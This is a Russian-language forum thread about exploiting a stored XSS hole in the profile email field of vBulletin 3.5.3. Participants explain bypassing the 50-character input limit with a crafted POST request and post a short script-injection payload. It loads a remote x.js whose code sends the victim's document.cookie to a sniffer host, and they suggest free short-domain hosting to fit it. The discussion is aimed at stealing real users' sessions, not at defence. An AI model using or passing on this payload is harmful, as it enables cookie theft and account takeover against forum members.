vBulletin 3.5.3. Вопрос по XSS в поле email
 

В этой версии форума в поле mail в профиле, можно провести xss

Вот, но поле для ввода ограничено 50ти символами, эм.. возникает вопрос: как быть тогда? +)

Наверное тогда никак - скрипт если тока уменьшить, но кажись это не реал...
Для того и есть эти ограничения)

В том то и дело) как тестилось-то? на локалхосте? :) зачем тогда xss? просто, чтобы признать ее существование?

Все гораздо проще, формируете ПОСТ запрос и туда подставляете все что нужно вместо поля e-mail. Все ограничения сразу же отпадают. У меня все работает без проблем.

yaa@mail.ru”<script>src=http://aa.bab.ru/x.js?<b> Хехе 49 символов. Если удасться такой короткий url найти для сайта.))) А в x.js img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;

Может сработает, а может и нет. ))

спасибо за идею)

под такой пример подойдет фришный хост на холме у них там h10.ru и h7.ru вместо лонига 2-3 символа